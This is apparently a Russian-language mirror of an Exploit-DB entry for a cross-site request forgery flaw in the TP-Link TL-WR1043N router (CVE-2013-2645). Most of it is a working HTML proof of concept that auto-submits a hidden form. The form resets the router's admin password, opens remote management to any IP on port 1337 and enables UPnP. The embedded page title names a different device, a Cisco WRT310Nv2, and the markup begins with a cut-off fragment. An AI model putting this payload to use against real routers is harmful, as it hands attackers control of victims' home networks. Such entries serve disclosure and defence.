- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38492
- Проверка EDB
-
- Пройдено
- Автор
- JACOB HOLCOMB
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- cve-2013-2645
- Дата публикации
- 2013-04-24
TP-Link TL-WR1043N Router - Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/59442/info
The TP-Link TL-WR1043N Router is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
d> <title>Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS</title> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="CSRFxssPWN" action="http://ww.example.com/apply.cgi" method="post"/> <input type="hidden" name="submit_button" value="Management"/> <input type="hidden" name="action" value="Apply"/> <input type="hidden" name="PasswdModify" value="1"/> <input type="hidden" name="http_enable" value="1"/> <input type="hidden" name="wait_time" value="0"/> <input type="hidden" name="http_passwd" value="ISE_1337"/> <input type="hidden" name="http_passwdConfirm" value="ISE_1337"/> <input type="hidden" name="_http_enable" value="1"/> <input type="hidden" name="remote_management" value="1"/> <input type="hidden" name="remote_upgrade" value="1"/> <input type="hidden" name="remote_ip_any" value="1"/> <input type="hidden" name="http_wanport" value="1337"/> <input type="hidden" name="upnp_enable" value="1"/> <input type="hidden" name="upnp_config" value="1"/> <input type="hidden" name="upnp_internet_dis" value="1"/> </form> <script> function PwN() {document.CSRFxssPWN.submit();}; window.setTimeout(PwN, 0025); </script> <body> </html>- Источник
- www.exploit-db.com
